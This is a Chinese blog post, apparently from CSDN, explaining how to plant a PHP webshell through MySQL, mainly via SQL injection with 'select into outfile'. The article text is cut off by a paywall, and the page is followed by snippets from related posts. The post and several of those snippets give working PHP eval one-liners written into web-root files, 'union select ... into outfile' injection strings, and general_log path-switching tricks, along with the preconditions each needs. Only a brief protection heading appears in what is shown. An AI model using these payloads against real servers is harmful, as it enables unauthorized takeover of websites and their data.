mysql写shell

最新推荐文章于 2024-05-17 08:26:16 发布
最新推荐文章于 2024-05-17 08:26:16 发布
阅读量1.8k 收藏 3
点赞数
文章标签: mysql 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47385895/article/details/126471862
版权
本文探讨了两种利用MySQL实现写Shell的方法:Sql注入写shell和慢日志查询写shell。对于Sql注入,重点讲解了select into outfile命令的使用,并提供了防护建议。而对于慢日志查询写shell,介绍了利用超过10秒查询将木马写入文件的手段,同样提出了安全防护措施。
摘要由CSDN通过智能技术生成

mysql写shell

一、Sql注入写shell

原理:select into outfile命令作用将查询结果输出保存到一个文件中
通过sql注入写shell的三个条件:

  1. 知道绝对路径
  2. Secure_file_priv开启
    1.png
    一般Secure_file_priv=null,即不允许导入导出,在mysql中my.ini的[mysqld]中添加一行“Secure_file_priv=”,然后重启mysql,让配置生效。
  3. 目录要有写的权限
    利用sql注入写入sql语句:select 1,2,“<?php @eval[$_POST[dd]; ?]>” into outfile “D:/phpstudy/phpstudy_pro/WWW/1.php”
    Mysql中select into outfile命令作用将查询结果输出保存到一个文件中,以上语句会保存到1.php文件中
    2.png
    随便什么刀连接一下
    3.png
    Getshell成功
    防护建议:利用sql注入漏洞结合数据库的输出文本功能形成getshell,
最低0.47元/天 解锁文章
-键盘侠-
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
mysqlShell小技巧_mysqlshell有几种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
06-21 460
1.Mysql数据库支持union的时候文件小技巧: 采用常规的union入,可以看到前面的字段占位数肯定也会被入,替换成null也是一样的结果,这个对于shell没啥大碍,mysqlShell小技巧,但是如果用来bat,mof,vbs等文件就会出问题了,那么怎么去掉这个只入我们需要的内容呢?采用hex编码就好了。
MYSQLshell
weixin_30412167的博客
07-04 647
利用需要满足以下条件: root权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,文件必须) 没有配置–secure-file-priv 成功条件:有读的权限,有create、insert、select的权限 Drop TABLE IF EXISTS temp;//如果存在temp就删掉Create TABLE temp(cmd text NOT NULL);...
MySQL注入shell的条件
huang0612123的博客
05-13 329
HVV面试
mysqlshell小技巧
weixin_30595035的博客
06-19 211
set global general_log=on;set @file=0x653A2F2F7777772F2F782E706870;set global general_log_file=@file;set global general_log=off; 转载于:https://www.cnblogs.com/websecyw/p/9200468.html
Mysqlshell的几种方式
Redredredfish的博客
08-23 7761
Mysqlshell的几种方式 当我们拿到数据库权限时,可通过数据库管理工具入webshell到目标服务器上,利用webshell控制目标服务器。 复现环境: phpstudy_pro 8.1.0.6 mysql 5.7.26 root权限 网站绝对路径为D:\phpstudy_pro\WWW 利用方式: 通过outfileshell 尝试通过outfile入文件 报错[Code: 1290, SQL State: HY000]The MySQL server is running with
mysql-shell
04-04
MySQL Shell 是一个强大的交互式工具,专为管理MySQL服务器、集群和存储引擎而设计。它提供了JavaScript、Python和SQL三种语言环境,使得数据库管理员和开发人员可以更方便地执行各种数据库操作,包括但不限于数据...
mysql备份shell脚本
06-10
mysql备份支持全量、日志备份
mysql-shell-8.0.30-linux-glibc2.12-x86-64bit.tar.gz
08-17
MySQL ShellMySQL数据库管理系统提供的一款强大的命令行工具,它集成了JavaScript、Python和SQL三种语言环境,为数据库管理员和开发者提供了交互式操作MySQL服务器、管理数据库对象以及执行复杂脚本的功能。...
mysql连接shell
10-12
mysqlshell命令导出数据,执行存储过程
shell的多线程&当前文件夹下批量插入MySQL
09-30
本文将详细讲解如何在Shell脚本中实现多线程,并结合实例介绍如何批量插入MySQL数据库。 首先,我们需要理解为什么要使用多线程。在处理大量并发任务时,多线程可以并发执行任务,避免串行执行的低效,尤其在需要对...
MySQLShell方法总结
做自己喜欢的事,并将其发挥到极致!
12-31 4762
MySQL注入点,用工具对目标站点入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `入的那个路径要有入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
mysqlshell,mysql多语句shell
weixin_39760919的博客
03-23 87
mysql> use xssdb;Database changedmysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D2...
mysql 注入shell_mysql注入shell
weixin_31001855的博客
01-19 277
如果一个平台有注入点的时候可以通过一句话拿shell条件1.myql 5.6.34 版本区分2.有的权限3.知道绝对路径MySQL 中 在在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL ,而 secure_file_priv为null 那么我们就不能导出文件,以下都建立在secure_file_priv 的默认值被修改为无才能利用,且这个只能手工修改配置...
sql注入shell条件与方法(统计)
Vdieoo的博客
10-30 7773
条件: 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有权限,一般image之类的存放突破的目录就有 在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。 要了解secure_file_priv是否支...
sqlshell原理_sql注入shell的条件
最新发布
2401_84281655的博客
05-17 825
1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要入木马的web路径,不然蚁剑如何连接获取方式有:(1)网页报错信息 (2)phpinfo等探针信息 (3)猜测常见web目录2. 对web目录有可权限即secure_file_priv = ''配置为空原因是--os-shell参数shell使用的是select xx into outfile而secure_file_priv此配置。
mysqlshell_基于mysql下的几种shell方法
weixin_35212670的博客
01-18 2931
0x00关于mysql下的shell方法网上基本很多了,我原本也没打算总结总结的,毕竟网上已经很多了,不过在看 kilon 大佬的博客的时候,给我的感受就是明明一个几句话的东西,总能详细的,有条有理的记录下来,所以也正是如此,才有了这篇文章。0x01利用条件数据库当前用户为root权限知道当前网站的绝对路径PHP的GPC为 off状态入的那个路径存在入权限0x02基于联合查询法下的两个入方...
通过MySQL入webshell的几种方式(小宇特详解)
小宇的web博客
08-07 5365
通过MySQL入webshell的几种方式 -01-通过outfileshell 利用条件 1.root权限2.网站的绝对路径且具有入权限,能够使用into outfile和into dumpfile来进行入。 这里用了以下的shell union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php' 这里连接蚁剑 -02-将shell入表中 利用条件 1.root权限2.网站
MySQLshell的问题
m0_62207482的博客
03-20 664
disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_ope n,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source`,但是可 以用dl扩展执行命令或者ImageMagick漏洞。secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值